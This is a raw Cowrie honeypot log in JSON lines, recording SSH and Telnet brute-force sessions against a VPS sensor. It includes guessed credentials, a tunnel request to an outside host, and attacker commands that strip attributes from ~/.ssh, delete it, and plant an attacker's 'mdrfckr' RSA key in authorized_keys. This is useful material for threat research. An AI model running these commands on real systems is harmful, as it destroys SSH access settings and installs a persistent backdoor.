{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":51270,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e9851ef3ddf","protocol":"ssh","message":"New connection: 134.199.174.250:51270 (1.2.3.4:22) [session: 6e9851ef3ddf]","sensor":"my-vps","timestamp":"2025-09-08T13:29:19.649505Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:29:19.650293Z","src_ip":"134.199.174.250","session":"6e9851ef3ddf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:29:19.930499Z","src_ip":"134.199.174.250","session":"6e9851ef3ddf"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1q2w3e4r","message":"login attempt [pi/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-09-08T13:29:20.880890Z","src_ip":"134.199.174.250","session":"6e9851ef3ddf"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:29:22.165152Z","src_ip":"134.199.174.250","session":"6e9851ef3ddf"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":18374,"dst_ip":"1.2.3.4","dst_port":22,"session":"76a535af1ede","protocol":"ssh","message":"New connection: 49.247.35.31:18374 (1.2.3.4:22) [session: 76a535af1ede]","sensor":"my-vps","timestamp":"2025-09-08T13:29:26.273875Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:29:26.283221Z","src_ip":"49.247.35.31","session":"76a535af1ede"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:29:26.573924Z","src_ip":"49.247.35.31","session":"76a535af1ede"}
{"eventid":"cowrie.login.success","username":"root","password":"Hetzner#@1","message":"login attempt [root/Hetzner#@1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:29:27.722387Z","src_ip":"49.247.35.31","session":"76a535af1ede"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:29:28.352183Z","src_ip":"49.247.35.31","session":"76a535af1ede"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:29:28.353005Z","src_ip":"49.247.35.31","session":"76a535af1ede"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:29:28.353852Z","src_ip":"49.247.35.31","session":"76a535af1ede"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:29:28.642217Z","src_ip":"49.247.35.31","session":"76a535af1ede"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:29:29.332264Z","src_ip":"49.247.35.31","session":"76a535af1ede"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:29:29.333124Z","src_ip":"49.247.35.31","session":"76a535af1ede"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:29:29.637046Z","src_ip":"49.247.35.31","session":"76a535af1ede"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:29:29.638080Z","src_ip":"49.247.35.31","session":"76a535af1ede"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":23831,"dst_ip":"1.2.3.4","dst_port":22,"session":"c55765f2b789","protocol":"ssh","message":"New connection: 49.247.35.31:23831 (1.2.3.4:22) [session: c55765f2b789]","sensor":"my-vps","timestamp":"2025-09-08T13:29:29.919372Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:29:29.922487Z","src_ip":"49.247.35.31","session":"c55765f2b789"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:29:30.216473Z","src_ip":"49.247.35.31","session":"c55765f2b789"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:29:31.382109Z","src_ip":"49.247.35.31","session":"c55765f2b789"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:29:32.676316Z","src_ip":"49.247.35.31","session":"c55765f2b789"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":28847,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7182f14ef37","protocol":"ssh","message":"New connection: 49.247.35.31:28847 (1.2.3.4:22) [session: f7182f14ef37]","sensor":"my-vps","timestamp":"2025-09-08T13:29:32.959613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:29:32.961702Z","src_ip":"49.247.35.31","session":"f7182f14ef37"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:29:33.255684Z","src_ip":"49.247.35.31","session":"f7182f14ef37"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:29:34.439922Z","src_ip":"49.247.35.31","session":"f7182f14ef37"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:29:34.736004Z","src_ip":"49.247.35.31","session":"76a535af1ede"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:29:34.737140Z","src_ip":"49.247.35.31","session":"f7182f14ef37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":20189,"dst_ip":"1.2.3.4","dst_port":23,"session":"a5cb6b140958","protocol":"telnet","message":"New connection: 212.227.125.160:20189 (1.2.3.4:23) [session: a5cb6b140958]","sensor":"my-vps","timestamp":"2025-09-08T13:29:38.434039Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:29:42.377679Z","src_ip":"176.65.149.186","session":"2e07e74af6c4"}
{"eventid":"cowrie.session.closed","duration":180.09421396255493,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:29:42.381931Z","src_ip":"176.65.149.186","session":"2e07e74af6c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55916,"dst_ip":"1.2.3.4","dst_port":23,"session":"871f1730f98f","protocol":"telnet","message":"New connection: 212.227.235.229:55916 (1.2.3.4:23) [session: 871f1730f98f]","sensor":"my-vps","timestamp":"2025-09-08T13:29:43.152104Z"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":39924,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3f22a076284","protocol":"ssh","message":"New connection: 134.199.174.250:39924 (1.2.3.4:22) [session: b3f22a076284]","sensor":"my-vps","timestamp":"2025-09-08T13:29:49.432657Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:29:49.433533Z","src_ip":"134.199.174.250","session":"b3f22a076284"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":9140,"dst_ip":"1.2.3.4","dst_port":22,"session":"055c6b940cb8","protocol":"ssh","message":"New connection: 212.227.125.160:9140 (1.2.3.4:22) [session: 055c6b940cb8]","sensor":"my-vps","timestamp":"2025-09-08T13:29:49.479382Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:29:49.480510Z","src_ip":"212.227.125.160","session":"055c6b940cb8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":9434,"dst_ip":"1.2.3.4","dst_port":22,"session":"0340d3900859","protocol":"ssh","message":"New connection: 212.227.125.160:9434 (1.2.3.4:22) [session: 0340d3900859]","sensor":"my-vps","timestamp":"2025-09-08T13:29:49.592885Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:29:49.593780Z","src_ip":"212.227.125.160","session":"0340d3900859"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T13:29:49.708349Z","src_ip":"212.227.125.160","session":"0340d3900859"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:29:49.754293Z","src_ip":"134.199.174.250","session":"b3f22a076284"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:29:50.053531Z","src_ip":"212.227.125.160","session":"0340d3900859"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T13:29:50.173229Z","session":"0340d3900859"}
{"eventid":"cowrie.login.failed","username":"pi","password":"pass123","message":"login attempt [pi/pass123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:29:50.768617Z","src_ip":"134.199.174.250","session":"b3f22a076284"}
{"eventid":"cowrie.session.closed","duration":12.580121278762817,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:29:51.014093Z","src_ip":"212.227.125.160","session":"a5cb6b140958"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":21577,"dst_ip":"1.2.3.4","dst_port":23,"session":"02ad7de83b65","protocol":"telnet","message":"New connection: 212.227.125.160:21577 (1.2.3.4:23) [session: 02ad7de83b65]","sensor":"my-vps","timestamp":"2025-09-08T13:29:51.208145Z"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:29:52.137243Z","src_ip":"134.199.174.250","session":"b3f22a076284"}
{"eventid":"cowrie.session.closed","duration":12.521303653717041,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:29:55.673341Z","src_ip":"212.227.235.229","session":"871f1730f98f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56211,"dst_ip":"1.2.3.4","dst_port":23,"session":"927ff7b9c131","protocol":"telnet","message":"New connection: 212.227.235.229:56211 (1.2.3.4:23) [session: 927ff7b9c131]","sensor":"my-vps","timestamp":"2025-09-08T13:29:55.902773Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56952,"dst_ip":"1.2.3.4","dst_port":22,"session":"7851238f9024","protocol":"ssh","message":"New connection: 212.227.235.229:56952 (1.2.3.4:22) [session: 7851238f9024]","sensor":"my-vps","timestamp":"2025-09-08T13:29:57.781166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:29:57.782430Z","src_ip":"212.227.235.229","session":"7851238f9024"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:29:57.937450Z","src_ip":"212.227.235.229","session":"7851238f9024"}
{"eventid":"cowrie.login.success","username":"root","password":"Huawei@5tgb","message":"login attempt [root/Huawei@5tgb] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:29:58.448015Z","src_ip":"212.227.235.229","session":"7851238f9024"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:29:58.797027Z","src_ip":"212.227.235.229","session":"7851238f9024"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:29:58.797725Z","src_ip":"212.227.235.229","session":"7851238f9024"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:29:58.798544Z","src_ip":"212.227.235.229","session":"7851238f9024"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:29:58.949649Z","src_ip":"212.227.235.229","session":"7851238f9024"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:29:59.175886Z","src_ip":"212.227.235.229","session":"7851238f9024"}
